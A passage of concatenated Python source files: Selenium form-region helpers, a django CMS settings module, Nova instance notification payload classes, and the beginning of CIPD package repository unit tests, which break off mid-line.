self.submit() def _set_from_field(self, value): self._fill_field_element(value, self.from_date) def _set_to_field(self, value): self._fill_field_element(value, self.to_date) class MetadataFormRegion(BaseFormRegion): _input_tmpl = ('//div[contains(@class, "input-group") and ' 'descendant::span[@title="{}"]]') _input_fields = (by.By.CSS_SELECTOR, 'div.input-group') _custom_input_field = (by.By.XPATH, "//input[@name='customItem']") _custom_input_button = (by.By.CSS_SELECTOR, 'span.input-group-btn > .btn') _submit_locator = (by.By.CSS_SELECTOR, '.modal-footer > .btn.btn-primary') _cancel_locator = (by.By.CSS_SELECTOR, '.modal-footer > .btn.btn-default') def _form_getter(self): return self.driver.find_element(*self._default_form_locator) @property def custom_field_value(self): return self._get_element(*self._custom_input_field) @property def add_button(self): return self._get_element(*self._custom_input_button) def add_custom_field(self, field_name, field_value): self.custom_field_value.send_keys(field_name) self.add_button.click() div = self._get_element(by.By.XPATH, self._input_tmpl.format(field_name)) field = div.find_element(by.By.CSS_SELECTOR, 'input') if not hasattr(self, field_name): self._dynamic_properties[field_name] = field self.set_field_value(field_name, field_value) def set_field_value(self, field_name, field_value): if hasattr(self, field_name): field = getattr(self, field_name) field.send_keys(field_value) else: raise AttributeError("Unknown form field '{}'.".format(field_name)) def get_existing_metadata(self): metadata = {} for div in self._get_elements(*self._input_fields): if div.text not in ('Custom',): field = div.find_element(by.By.CSS_SELECTOR, 'input') metadata[div.text] = field.get_attribute('value') return metadata class ItemTextDescription(baseregion.BaseRegion): _separator_locator = (by.By.CSS_SELECTOR, 'dl.dl-horizontal') _key_locator = (by.By.CSS_SELECTOR, 'dt') _value_locator = (by.By.CSS_SELECTOR, 'dd') def __init__(self, driver, conf, src=None): super(ItemTextDescription, self).__init__(driver, conf, src) def get_content(self): keys = [] values = [] for section in self._get_elements(*self._separator_locator): keys.extend([x.text for x in section.find_elements(*self._key_locator)]) values.extend([x.text for x in section.find_elements(*self._value_locator)]) return dict(zip(keys, values)) class ReadOnlyFormRegion(BaseFormRegion): """Form with read only fields. Typical example is located on Project/Compute/Access and Security/API Access page (View Credentials form). """ _labels_locator = (by.By.CSS_SELECTOR, '.left > fieldset label, ' '.right > fieldset label') _fields_locator = (by.By.CSS_SELECTOR, '.left > fieldset input, ' '.right > fieldset input') @property def get_form_labels(self): label_elements = self._get_elements(*self._labels_locator) labels = [label_element.text for label_element in label_elements] return labels @property def get_form_fields(self): field_elements = self._get_elements(*self._fields_locator) field_values = [field_element.get_attribute("value") for field_element in field_elements] labels = self.get_form_labels for item in range(len(labels)): self._dynamic_properties[labels[item]] = field_values[item] return self._dynamic_properties class MembershipFormRegion(BaseFormRegion): _available_locator = (by.By.CSS_SELECTOR, '.available_members > ul') _allocated_locator = (by.By.CSS_SELECTOR, '.members > ul') _name_sublocator = (by.By.CSS_SELECTOR, 'li.member > span.display_name') _add_remove_sublocator = (by.By.CSS_SELECTOR, 'li.active > a[href="#add_remove"]') def _get_item_name(self, element): return element.find_element(*self._name_sublocator).text @property def available_items(self): items = self._wait_until( lambda _: self._get_elements(*self._available_locator)) return {self._get_item_name(el): el for el in items} @property def allocated_items(self): return {self._get_item_name(el): el for el in self._get_elements(*self._allocated_locator)} def allocate_item(self, name): item = self.available_items[name] allocate_btn = item.find_element(*self._add_remove_sublocator) allocate_btn.click() def deallocate_item(self, name): item = self.allocated_items[name] deallocate_btn = item.find_element(*self._add_remove_sublocator) deallocate_btn.click()
# -*- coding: utf-8 -*- from functools import update_wrapper import os from django.conf import settings from django.core.exceptions import ImproperlyConfigured from django.utils.translation import ugettext_lazy as _ from django.utils.six.moves.urllib.parse import urljoin from cms import constants __all__ = ['get_cms_setting'] class VERIFIED: pass # need a unique identifier for CMS_LANGUAGES def default(name): def decorator(wrapped): def wrapper(): if hasattr(settings, name): return getattr(settings, name) return wrapped() update_wrapper(wrapper, wrapped) return wrapped return decorator DEFAULTS = { 'TEMPLATE_INHERITANCE': True, 'TOOLBAR_SIMPLE_STRUCTURE_MODE': True, 'PLACEHOLDER_CONF': {}, 'PERMISSION': False, # Whether to use raw ID lookups for users when PERMISSION is True 'RAW_ID_USERS': False, 'PUBLIC_FOR': 'all', 'CONTENT_CACHE_DURATION': 60, 'APPHOOKS': [], 'TOOLBARS': [], 'SITE_CHOICES_CACHE_KEY': 'CMS:site_choices', 'PAGE_CHOICES_CACHE_KEY': 'CMS:page_choices', 'MEDIA_PATH': 'cms/', 'PAGE_MEDIA_PATH': 'cms_page_media/', 'TITLE_CHARACTER': '+', 'PAGE_CACHE': True, 'PLACEHOLDER_CACHE': True, 'PLUGIN_CACHE': True, 'CACHE_PREFIX': 'cms-', 'PLUGIN_PROCESSORS': [], 'PLUGIN_CONTEXT_PROCESSORS': [], 'UNIHANDECODE_VERSION': None, 'UNIHANDECODE_DECODERS': ['ja', 'zh', 'kr', 'vn', 'diacritic'], 'UNIHANDECODE_DEFAULT_DECODER': 'diacritic', 'MAX_PAGE_PUBLISH_REVERSIONS': 10, 'MAX_PAGE_HISTORY_REVERSIONS': 15, 'TOOLBAR_ANONYMOUS_ON': True, 'TOOLBAR_URL__EDIT_ON': 'edit', 'TOOLBAR_URL__EDIT_OFF': 'edit_off', 'TOOLBAR_URL__BUILD': 'build', 'TOOLBAR_URL__DISABLE': 'toolbar_off', 'ADMIN_NAMESPACE': 'admin', 'APP_NAME': None, 'TOOLBAR_HIDE': False } def get_cache_durations(): return { 'menus': getattr(settings, 'MENU_CACHE_DURATION', 60 * 60), 'content': get_cms_setting('CONTENT_CACHE_DURATION'), 'permissions': 60 * 60, } @default('CMS_MEDIA_ROOT') def get_media_root(): return os.path.join(settings.MEDIA_ROOT, get_cms_setting('MEDIA_PATH')) @default('CMS_MEDIA_URL') def get_media_url(): return urljoin(settings.MEDIA_URL, get_cms_setting('MEDIA_PATH')) @default('CMS_TOOLBAR_URL__EDIT_ON') def get_toolbar_url__edit_on(): return get_cms_setting('TOOLBAR_URL__EDIT_ON') @default('CMS_TOOLBAR_URL__EDIT_OFF') def get_toolbar_url__edit_off(): return get_cms_setting('TOOLBAR_URL__EDIT_OFF') @default('CMS_TOOLBAR_URL__BUILD') def get_toolbar_url__build(): return get_cms_setting('TOOLBAR_URL__BUILD') @default('CMS_TOOLBAR_URL__DISABLE') def get_toolbar_url__disable(): return get_cms_setting('TOOLBAR_URL__DISABLE') def get_templates(): from cms.utils.django_load import load_from_file if getattr(settings, 'CMS_TEMPLATES_DIR', False): tpldir = getattr(settings, 'CMS_TEMPLATES_DIR', False) # CMS_TEMPLATES_DIR can either be a string poiting to the templates directory # or a dictionary holding 'site: template dir' entries if isinstance(tpldir, dict): tpldir = tpldir[settings.SITE_ID] # We must extract the relative path of CMS_TEMPLATES_DIR to the neares # valid templates directory. Here we mimick what the filesystem and # app_directories template loaders do prefix = '' # Relative to TEMPLATE_DIRS for filesystem loader try: path = settings.TEMPLATE_DIRS except IndexError: path = [template['DIRS'][0] for template in settings.TEMPLATES] for basedir in path: if tpldir.find(basedir) == 0: prefix = tpldir.replace(basedir + os.sep, '') break # Relative to 'templates' directory that app_directory scans if not prefix: components = tpldir.split(os.sep) try: prefix = os.path.join(*components[components.index('templates') + 1:]) except ValueError: # If templates is not found we use the directory name as prefix # and hope for the best prefix = os.path.basename(tpldir) config_path = os.path.join(tpldir, '__init__.py') # Try to load templates list and names from the template module # If module file is not present skip configuration and just dump the filenames as templates if config_path: template_module = load_from_file(config_path) templates = [(os.path.join(prefix, data[0].strip()), data[1]) for data in template_module.TEMPLATES.items()] else: templates = list((os.path.join(prefix, tpl), tpl) for tpl in os.listdir(tpldir)) else: templates = list(getattr(settings, 'CMS_TEMPLATES', [])) if get_cms_setting('TEMPLATE_INHERITANCE'): templates.append((constants.TEMPLATE_INHERITANCE_MAGIC, _(constants.TEMPLATE_INHERITANCE_LABEL))) return templates def _ensure_languages_settings(languages): valid_language_keys = ['code', 'name', 'fallbacks', 'hide_untranslated', 'redirect_on_fallback', 'public'] required_language_keys = ['code', 'name'] simple_defaults = ['public', 'redirect_on_fallback', 'hide_untranslated'] if not isinstance(languages, dict): raise ImproperlyConfigured( "CMS_LANGUAGES must be a dictionary with site IDs and 'default'" " as keys. Please check the format.") defaults = languages.pop('default', {}) default_fallbacks = defaults.get('fallbacks') needs_fallbacks = [] for key in defaults: if key not in valid_language_keys: raise ImproperlyConfigured("CMS_LANGUAGES has an invalid property in the default properties: %s" % key) for key in simple_defaults: if key not in defaults: defaults[key] = True for site, language_list in languages.items(): if site != hash(site): raise ImproperlyConfigured( "CMS_LANGUAGES can only be filled with integers (site IDs) and 'default'" " for default values. %s is not a valid key." % site) for language_object in language_list: for required_key in required_language_keys: if required_key not in language_object: raise ImproperlyConfigured("CMS_LANGUAGES has a language which is missing the required key %r " "in site %r" % (key, site)) language_code = language_object['code'] for key in language_object: if key not in valid_language_keys: raise ImproperlyConfigured( "CMS_LANGUAGES has invalid key %r in language %r in site %r" % (key, language_code, site) ) if 'fallbacks' not in language_object: if default_fallbacks: language_object['fallbacks'] = default_fallbacks else: needs_fallbacks.append((site, language_object)) for key in simple_defaults: if key not in language_object: language_object[key] = defaults[key] site_fallbacks = {} for site, language_object in needs_fallbacks: if site not in site_fallbacks: site_fallbacks[site] = [lang['code'] for lang in languages[site] if lang['public']] language_object['fallbacks'] = [lang_code for lang_code in site_fallbacks[site] if lang_code != language_object['code']] languages['default'] = defaults languages[VERIFIED] = True # this will be busted by @override_settings and cause a re-check return languages def get_languages(): if settings.SITE_ID != hash(settings.SITE_ID): raise ImproperlyConfigured( "SITE_ID must be an integer" ) if not settings.USE_I18N: return _ensure_languages_settings( {settings.SITE_ID: [{'code': settings.LANGUAGE_CODE, 'name': settings.LANGUAGE_CODE}]}) if settings.LANGUAGE_CODE not in dict(settings.LANGUAGES): raise ImproperlyConfigured( 'LANGUAGE_CODE "%s" must have a matching entry in LANGUAGES' % settings.LANGUAGE_CODE ) languages = getattr(settings, 'CMS_LANGUAGES', { settings.SITE_ID: [{'code': code, 'name': _(name)} for code, name in settings.LANGUAGES] }) if VERIFIED in languages: return languages return _ensure_languages_settings(languages) def get_unihandecode_host(): host = getattr(settings, 'CMS_UNIHANDECODE_HOST', None) if not host: return host if host.endswith('/'): return host else: return host + '/' COMPLEX = { 'CACHE_DURATIONS': get_cache_durations, 'MEDIA_ROOT': get_media_root, 'MEDIA_URL': get_media_url, # complex because not prefixed by CMS_ 'TEMPLATES': get_templates, 'LANGUAGES': get_languages, 'UNIHANDECODE_HOST': get_unihandecode_host, 'CMS_TOOLBAR_URL__EDIT_ON': get_toolbar_url__edit_on, 'CMS_TOOLBAR_URL__EDIT_OFF': get_toolbar_url__edit_off, 'CMS_TOOLBAR_URL__BUILD': get_toolbar_url__build, 'CMS_TOOLBAR_URL__DISABLE': get_toolbar_url__disable, } def get_cms_setting(name): if name in COMPLEX: return COMPLEX[name]() else: return getattr(settings, 'CMS_%s' % name, DEFAULTS[name]) def get_site_id(site): from django.contrib.sites.models import Site if isinstance(site, Site): return site.id try: return int(site) except (TypeError, ValueError): pass return settings.SITE_ID
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova.notifications.objects import base from nova.objects import base as nova_base from nova.objects import fields @nova_base.NovaObjectRegistry.register_notification class InstancePayload(base.NotificationPayloadBase): SCHEMA = { 'uuid': ('instance', 'uuid'), 'user_id': ('instance', 'user_id'), 'tenant_id': ('instance', 'project_id'), 'reservation_id': ('instance', 'reservation_id'), 'display_name': ('instance', 'display_name'), 'display_description': ('instance', 'display_description'), 'host_name': ('instance', 'hostname'), 'host': ('instance', 'host'), 'node': ('instance', 'node'), 'os_type': ('instance', 'os_type'), 'architecture': ('instance', 'architecture'), 'availability_zone': ('instance', 'availability_zone'), 'image_uuid': ('instance', 'image_ref'), 'kernel_id': ('instance', 'kernel_id'), 'ramdisk_id': ('instance', 'ramdisk_id'), 'created_at': ('instance', 'created_at'), 'launched_at': ('instance', 'launched_at'), 'terminated_at': ('instance', 'terminated_at'), 'deleted_at': ('instance', 'deleted_at'), 'state': ('instance', 'vm_state'), 'power_state': ('instance', 'power_state'), 'task_state': ('instance', 'task_state'), 'progress': ('instance', 'progress'), 'metadata': ('instance', 'metadata'), 'locked': ('instance', 'locked'), } # Version 1.0: Initial version # Version 1.1: add locked and display_description field VERSION = '1.1' fields = { 'uuid': fields.UUIDField(), 'user_id': fields.StringField(nullable=True), 'tenant_id': fields.StringField(nullable=True), 'reservation_id': fields.StringField(nullable=True), 'display_name': fields.StringField(nullable=True), 'display_description': fields.StringField(nullable=True), 'host_name': fields.StringField(nullable=True), 'host': fields.StringField(nullable=True), 'node': fields.StringField(nullable=True), 'os_type': fields.StringField(nullable=True), 'architecture': fields.StringField(nullable=True), 'availability_zone': fields.StringField(nullable=True), 'flavor': fields.ObjectField('FlavorPayload'), 'image_uuid': fields.StringField(nullable=True), 'kernel_id': fields.StringField(nullable=True), 'ramdisk_id': fields.StringField(nullable=True), 'created_at': fields.DateTimeField(nullable=True), 'launched_at': fields.DateTimeField(nullable=True), 'terminated_at': fields.DateTimeField(nullable=True), 'deleted_at': fields.DateTimeField(nullable=True), 'state': fields.InstanceStateField(nullable=True), 'power_state': fields.InstancePowerStateField(nullable=True), 'task_state': fields.InstanceTaskStateField(nullable=True), 'progress': fields.IntegerField(nullable=True), 'ip_addresses': fields.ListOfObjectsField('IpPayload'), 'metadata': fields.DictOfStringsField(), 'locked': fields.BooleanField(), } def __init__(self, instance, **kwargs): super(InstancePayload, self).__init__(**kwargs) self.populate_schema(instance=instance) @nova_base.NovaObjectRegistry.register_notification class InstanceActionPayload(InstancePayload): # No SCHEMA as all the additional fields are calculated # Version 1.1: locked and display_description added to InstancePayload VERSION = '1.1' fields = { 'fault': fields.ObjectField('ExceptionPayload', nullable=True), } def __init__(self, instance, fault, ip_addresses, flavor, **kwargs): super(InstanceActionPayload, self).__init__( instance=instance, fault=fault, ip_addresses=ip_addresses, flavor=flavor, **kwargs) @nova_base.NovaObjectRegistry.register_notification class InstanceActionVolumeSwapPayload(InstanceActionPayload): # No SCHEMA as all the additional fields are calculated # Version 1.1: locked and display_description added to InstancePayload VERSION = '1.1' fields = { 'old_volume_id': fields.UUIDField(), 'new_volume_id': fields.UUIDField(), } def __init__(self, instance, fault, ip_addresses, flavor, old_volume_id, new_volume_id): super(InstanceActionVolumeSwapPayload, self).__init__( instance=instance, fault=fault, ip_addresses=ip_addresses, flavor=flavor, old_volume_id=old_volume_id, new_volume_id=new_volume_id) @nova_base.NovaObjectRegistry.register_notification class InstanceUpdatePayload(InstancePayload): # Version 1.0: Initial version # Version 1.1: locked and display_description added to InstancePayload VERSION = '1.1' fields = { 'state_update': fields.ObjectField('InstanceStateUpdatePayload'), 'audit_period': fields.ObjectField('AuditPeriodPayload'), 'bandwidth': fields.ListOfObjectsField('BandwidthPayload'), 'old_display_name': fields.StringField(nullable=True) } def __init__(self, instance, flavor, ip_addresses, state_update, audit_period, bandwidth, old_display_name): super(InstanceUpdatePayload, self).__init__( instance=instance, flavor=flavor, ip_addresses=ip_addresses, state_update=state_update, audit_period=audit_period, bandwidth=bandwidth, old_display_name=old_display_name) @nova_base.NovaObjectRegistry.register_notification class IpPayload(base.NotificationPayloadBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'label': fields.StringField(), 'mac': fields.MACAddressField(), 'meta': fields.DictOfStringsField(), 'port_uuid': fields.UUIDField(nullable=True), 'version': fields.IntegerField(), 'address': fields.IPV4AndV6AddressField(), 'device_name': fields.StringField(nullable=True) } @classmethod def from_network_info(cls, network_info): """Returns a list of IpPayload object based on the passed network_info. """ ips = [] if network_info is not None: for vif in network_info: for ip in vif.fixed_ips(): ips.append(cls( label=vif["network"]["label"], mac=vif["address"], meta=vif["meta"], port_uuid=vif["id"], version=ip["version"], address=ip["address"], device_name=vif["devname"])) return ips @nova_base.NovaObjectRegistry.register_notification class BandwidthPayload(base.NotificationPayloadBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'network_name': fields.StringField(), 'in_bytes': fields.IntegerField(), 'out_bytes': fields.IntegerField(), } @nova_base.NovaObjectRegistry.register_notification class AuditPeriodPayload(base.NotificationPayloadBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'audit_period_beginning': fields.DateTimeField(), 'audit_period_ending': fields.DateTimeField(), } @nova_base.NovaObjectRegistry.register_notification class InstanceStateUpdatePayload(base.NotificationPayloadBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'old_state': fields.StringField(nullable=True), 'state': fields.StringField(nullable=True), 'old_task_state': fields.StringField(nullable=True), 'new_task_state': fields.StringField(nullable=True), } @base.notification_sample('instance-delete-start.json') @base.notification_sample('instance-delete-end.json') @base.notification_sample('instance-pause-start.json') @base.notification_sample('instance-pause-end.json') @base.notification_sample('instance-unpause-start.json') @base.notification_sample('instance-unpause-end.json') @base.notification_sample('instance-resize-start.json') @base.notification_sample('instance-resize-end.json') @base.notification_sample('instance-suspend-start.json') @base.notification_sample('instance-suspend-end.json') @base.notification_sample('instance-power_on-start.json') @base.notification_sample('instance-power_on-end.json') @base.notification_sample('instance-power_off-start.json') @base.notification_sample('instance-power_off-end.json') # @base.notification_sample('instance-reboot-start.json') # @base.notification_sample('instance-reboot-end.json') @base.notification_sample('instance-shutdown-start.json') @base.notification_sample('instance-shutdown-end.json') @base.notification_sample('instance-snapshot-start.json') @base.notification_sample('instance-snapshot-end.json') # @base.notification_sample('instance-add_fixed_ip-start.json') # @base.notification_sample('instance-add_fixed_ip-end.json') @base.notification_sample('instance-shelve-start.json') @base.notification_sample('instance-shelve-end.json') @base.notification_sample('instance-resume-start.json') @base.notification_sample('instance-resume-end.json') @base.notification_sample('instance-restore-start.json') @base.notification_sample('instance-restore-end.json') # @base.notification_sample('instance-evacuate.json') @base.notification_sample('instance-resize_finish-start.json') @base.notification_sample('instance-resize_finish-end.json') # @base.notification_sample('instance-live_migration_pre-start.json') # @base.notification_sample('instance-live_migration_pre-end.json') # @base.notification_sample('instance-live_migration_abort-start.json') # @base.notification_sample('instance-live_migration_abort-end.json') # @base.notification_sample('instance-live_migration_post-start.json') # @base.notification_sample('instance-live_migration_post-end.json') # @base.notification_sample('instance-live_migration_post_dest-start.json') # @base.notification_sample('instance-live_migration_post_dest-end.json') # @base.notification_sample('instance-live_migration_rollback-start.json') # @base.notification_sample('instance-live_migration_rollback-end.json') # @base.notification_sample('instance-live_migration_rollback_dest-start.json') # @base.notification_sample('instance-live_migration_rollback_dest-end.json') # @base.notification_sample('instance-rebuild-error.json') # @base.notification_sample('instance-remove_fixed_ip-start.json') # @base.notification_sample('instance-remove_fixed_ip-end.json') # @base.notification_sample('instance-resize_confirm-start.json') # @base.notification_sample('instance-resize_confirm-end.json') # @base.notification_sample('instance-resize_prep-start.json') # @base.notification_sample('instance-resize_revert-start.json') # @base.notification_sample('instance-resize_revert-end.json') @base.notification_sample('instance-shelve_offload-start.json') @base.notification_sample('instance-shelve_offload-end.json') # @base.notification_sample('instance-soft_delete-start.json') # @base.notification_sample('instance-soft_delete-end.json') # @base.notification_sample('instance-trigger_crash_dump-start.json') # @base.notification_sample('instance-trigger_crash_dump-end.json') # @base.notification_sample('instance-unrescue-start.json') # @base.notification_sample('instance-unrescue-end.json') @base.notification_sample('instance-unshelve-start.json') @base.notification_sample('instance-unshelve-end.json') @base.notification_sample('instance-create-start.json') @base.notification_sample('instance-create-end.json') @nova_base.NovaObjectRegistry.register_notification class InstanceActionNotification(base.NotificationBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'payload': fields.ObjectField('InstanceActionPayload') } @base.notification_sample('instance-update.json') @nova_base.NovaObjectRegistry.register_notification class InstanceUpdateNotification(base.NotificationBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'payload': fields.ObjectField('InstanceUpdatePayload') } @base.notification_sample('instance-volume_swap-start.json') @base.notification_sample('instance-volume_swap-end.json') @base.notification_sample('instance-volume_swap-error.json') @nova_base.NovaObjectRegistry.register_notification class InstanceActionVolumeSwapNotification(base.NotificationBase): # Version 1.0: Initial version VERSION = '1.0' fields = { 'payload': fields.ObjectField('InstanceActionVolumeSwapPayload') }
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import datetime import hashlib import StringIO import unittest import zipfile from google.appengine.ext import ndb from testing_utils import testing from components import auth from components import utils from cas import impl as cas_impl from cipd import impl from cipd import processing class TestValidators(unittest.TestCase): def test_is_valid_package_name(self): self.assertTrue(impl.is_valid_package_name('a')) self.assertTrue(impl.is_valid_package_name('a/b')) self.assertTrue(impl.is_valid_package_name('a/b/c/1/2/3')) self.assertTrue(impl.is_valid_package_name('infra/tools/cipd')) self.assertTrue(impl.is_valid_package_name('-/_')) self.assertFalse(impl.is_valid_package_name('')) self.assertFalse(impl.is_valid_package_name('/a')) self.assertFalse(impl.is_valid_package_name('a/')) self.assertFalse(impl.is_valid_package_name('A')) self.assertFalse(impl.is_valid_package_name('a/B')) self.assertFalse(impl.is_valid_package_name('a\\b')) def test_is_valid_package_path(self): self.assertTrue(impl.is_valid_package_path('a')) self.assertTrue(impl.is_valid_package_path('a/b')) self.assertTrue(impl.is_valid_package_path('a/b/c/1/2/3')) self.assertTrue(impl.is_valid_package_path('infra/tools/cipd')) self.assertTrue(impl.is_valid_package_path('-/_')) self.assertFalse(impl.is_valid_package_path('')) self.assertFalse(impl.is_valid_package_path('/a')) self.assertFalse(impl.is_valid_package_path('a/')) self.assertFalse(impl.is_valid_package_path('A')) self.assertFalse(impl.is_valid_package_path('a/B')) self.assertFalse(impl.is_valid_package_path('a\\b')) def test_is_valid_instance_id(self): self.assertTrue(impl.is_valid_instance_id('a'*40)) self.assertFalse(impl.is_valid_instance_id('')) self.assertFalse(impl.is_valid_instance_id('A'*40)) def test_is_valid_package_ref(self): self.assertTrue(impl.is_valid_package_ref('ref')) self.assertTrue(impl.is_valid_package_ref('abc-_0123')) self.assertFalse(impl.is_valid_package_ref('')) self.assertFalse(impl.is_valid_package_ref('no-CAPS')) self.assertFalse(impl.is_valid_package_ref('a'*500)) # Tags are not refs. self.assertFalse(impl.is_valid_package_ref('key:value')) self.assertFalse(impl.is_valid_package_ref('key:')) # Instance IDs are not refs. self.assertFalse(impl.is_valid_package_ref('a'*40)) def test_is_valid_instance_tag(self): self.assertTrue(impl.is_valid_instance_tag('k:v')) self.assertTrue(impl.is_valid_instance_tag('key:')) self.assertTrue(impl.is_valid_instance_tag('key-_01234:#$%@\//%$SD')) self.assertFalse(impl.is_valid_instance_tag('')) self.assertFalse(impl.is_valid_instance_tag('key')) self.assertFalse(impl.is_valid_instance_tag('KEY:')) self.assertFalse(impl.is_valid_instance_tag('key:' + 'a'*500)) class TestRepoService(testing.AppengineTestCase): maxDiff = None def setUp(self): super(TestRepoService, self).setUp() self.mocked_cas_service = MockedCASService() self.mock(impl.cas, 'get_cas_service', lambda: self.mocked_cas_service) self.service = impl.get_repo_service() def register_fake_instance(self, pkg_name): _, registered = self.service.register_instance( package_name=pkg_name, instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) def test_list_packages_no_path(self): self.assertIsNone(self.service.get_package('a/b')) self.assertIsNone(self.service.get_package('y/z')) self.register_fake_instance('y/z') self.register_fake_instance('a/b') self.assertEqual(([], ['a', 'y']), self.service.list_packages('', False)) self.assertEqual((['a/b', 'y/z'], ['a', 'y']), self.service.list_packages('', True)) def test_list_packages_with_path(self): self.assertIsNone(self.service.get_package('a/b')) self.assertIsNone(self.service.get_package('y/x')) self.assertIsNone(self.service.get_package('y/z/z')) self.register_fake_instance('y/x') self.register_fake_instance('y/z/z') self.register_fake_instance('a/b') self.assertEqual((['y/x'], ['y/z']), self.service.list_packages('y', False)) self.assertEqual((['y/z/z'], []), self.service.list_packages('y/z/z', False)) self.assertEqual((['y/x'], ['y/z']), self.service.list_packages('y/', False)) self.assertEqual((['y/x', 'y/z/z'], ['y/z']), self.service.list_packages('y', True)) def test_list_packages_ignore_substrings(self): self.assertIsNone(self.service.get_package('good/path')) self.register_fake_instance('good/path') self.assertEqual((['good/path'], []), self.service.list_packages('good', False)) self.assertEqual((['good/path'], []), self.service.list_packages('good/', False)) self.assertEqual(([], []), self.service.list_packages('goo', False)) def test_list_packages_where_a_package_is_also_a_directory(self): self.assertIsNone(self.service.get_package('good')) self.assertIsNone(self.service.get_package('good/path')) self.register_fake_instance('good') self.register_fake_instance('good/path') self.assertEqual((['good'], ['good']), self.service.list_packages('', False)) self.assertEqual((['good', 'good/path'], ['good']), self.service.list_packages('', True)) # To keep things simple we match packages with names matching the search # with the trailing slash stripped. self.assertEqual((['good', 'good/path'], []), self.service.list_packages('good/', False)) def test_list_packages_with_an_empty_directory(self): self.assertIsNone(self.service.get_package('good/sub/path')) self.register_fake_instance('good/sub/path') self.assertEqual(([], ['good/sub']), self.service.list_packages('good', False)) self.assertEqual((['good/sub/path'], ['good/sub']), self.service.list_packages('good', True)) self.assertEqual((['good/sub/path'], ['good', 'good/sub']), self.service.list_packages('', True)) def test_register_instance_new(self): self.assertIsNone(self.service.get_instance('a/b', 'a'*40)) self.assertIsNone(self.service.get_package('a/b')) inst, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) self.assertEqual( ndb.Key('Package', 'a/b', 'PackageInstance', 'a'*40), inst.key) self.assertEqual('a/b', inst.package_name) self.assertEqual('a'*40, inst.instance_id) expected = { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'processors_failure': [], 'processors_pending': [], 'processors_success': [], } self.assertEqual(expected, inst.to_dict()) self.assertEqual( expected, self.service.get_instance('a/b', 'a'*40).to_dict()) pkg = self.service.get_package('a/b') self.assertTrue(pkg) self.assertEqual('a/b', pkg.package_name) def test_register_instance_existing(self): # First register a package. inst1, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com')) self.assertTrue(registered) # Try to register it again. inst2, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:def@example.com')) self.assertFalse(registered) self.assertEqual(inst1.to_dict(), inst2.to_dict()) def test_generate_fetch_url(self): inst, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) url = self.service.generate_fetch_url(inst) self.assertEqual( 'https://signed-url/SHA1/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', url) def test_is_instance_file_uploaded(self): self.mocked_cas_service.uploaded[('SHA1', 'a'*40)] = '' self.assertTrue(self.service.is_instance_file_uploaded('a/b', 'a'*40)) self.assertFalse(self.service.is_instance_file_uploaded('a/b', 'b'*40)) def test_create_upload_session(self): upload_url, upload_session_id = self.service.create_upload_session( 'a/b', 'a'*40, auth.Identity.from_bytes('user:abc@example.com')) self.assertEqual('http://upload_url', upload_url) self.assertEqual('upload_session_id', upload_session_id) def test_register_instance_with_processing(self): self.mock(utils, 'utcnow', lambda: datetime.datetime(2014, 1, 1)) self.service.processors.append(MockedProcessor('bad', 'Error message')) self.service.processors.append(MockedProcessor('good')) tasks = [] def mocked_enqueue_task(**kwargs): tasks.append(kwargs) return True self.mock(impl.utils, 'enqueue_task', mocked_enqueue_task) # The processors are added to the pending list. inst, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) expected = { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'processors_failure': [], 'processors_pending': ['bad', 'good'], 'processors_success': [], } self.assertEqual(expected, inst.to_dict()) # The processing task is enqueued. self.assertEqual([{ 'payload': '{"instance_id": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", ' '"package_name": "a/b", "processors": ["bad", "good"]}', 'queue_name': 'cipd-process', 'transactional': True, 'url': '/internal/taskqueue/cipd-process/' 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', }], tasks) # Now execute the task. self.service.process_instance( package_name='a/b', instance_id='a'*40, processors=['bad', 'good']) # Assert the final state. inst = self.service.get_instance('a/b', 'a'*40) expected = { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'processors_failure': ['bad'], 'processors_pending': [], 'processors_success': ['good'], } self.assertEqual(expected, inst.to_dict()) good_result = self.service.get_processing_result('a/b', 'a'*40, 'good') self.assertEqual({ 'created_ts': datetime.datetime(2014, 1, 1), 'error': None, 'result': { 'instance_id': 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', 'package_name': 'a/b', 'processor_name': 'good', }, 'success': True, }, good_result.to_dict()) bad_result = self.service.get_processing_result('a/b', 'a'*40, 'bad') self.assertEqual({ 'created_ts': datetime.datetime(2014, 1, 1), 'error': 'Error message', 'result': None, 'success': False, }, bad_result.to_dict()) def test_client_binary_extraction(self): self.mock(utils, 'utcnow', lambda: datetime.datetime(2014, 1, 